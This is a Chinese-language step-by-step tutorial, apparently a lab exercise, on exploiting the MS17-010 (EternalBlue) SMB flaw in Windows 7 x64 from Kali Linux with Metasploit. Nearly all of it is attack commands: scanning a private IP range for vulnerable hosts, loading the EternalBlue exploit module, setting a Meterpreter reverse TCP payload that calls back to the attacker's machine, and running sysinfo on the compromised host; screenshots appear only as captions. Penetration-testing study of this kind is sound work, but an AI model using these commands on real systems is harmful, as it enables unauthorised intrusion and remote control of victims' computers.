MS17_010漏洞攻击Windows7

攻击主机系统:Kali Linux 2018

目标主机系统:Windows7 x64

MS17_010漏洞攻击Windows7_第1张图片

 

 

1.攻击主机启动Metasploit:

 msfconsole 

MS17_010漏洞攻击Windows7_第2张图片

 

 2.查找MS17_010漏洞相关的信息:

 search ms17_010 

一次查找不到就多查找几次

MS17_010漏洞攻击Windows7_第3张图片

 

 3.扫描到四个模块

模块二:探测主机是否存在MS17_010漏洞

模块三:漏洞利用

使用模块二来探测MS17_010漏洞

 use auxiliary/scanner/smb/smb_ms17_010 

 

 4.设置想要探测的目标主机的ip或者ip范围(如果单个ip就设置一个ip就可以了,这里我们演示扫ip范围)

 set RHOSTS 192.168.48.125-192.168.48.135 

 

5. 启动探测

 exploit

回显[+]二不是[*]的就为存在该漏洞的主机

MS17_010漏洞攻击Windows7_第4张图片

 

 6.探测到了目标主机后,启动漏洞利用模块

 use exploit/windows/smb/ms17_010_eternalblue 

 

 7.查看需要设置的参数

 show options 

MS17_010漏洞攻击Windows7_第5张图片

 

 8.查看payloads:

 show payloads 

MS17_010漏洞攻击Windows7_第6张图片

 

 9.设置payload:

 set payload windows/x64/meterpreter/reverse_tcp 

 

 10.设定目标主机:

 set RHOST 192.168.48.130 

 

 11.设定攻击主机:

 set LHOST 192.168.48.131 

 

12. 开始攻击:

 exploit 或者 run 

MS17_010漏洞攻击Windows7_第7张图片

 

13. 攻击成功,使用meterpreter模块开始控制目标主机

 

 14.查看目标主机的信息:

 sysinfo 

MS17_010漏洞攻击Windows7_第8张图片

 

 

 

[Meterpreter命令详解]

你可能感兴趣的:(MS17_010漏洞攻击Windows7)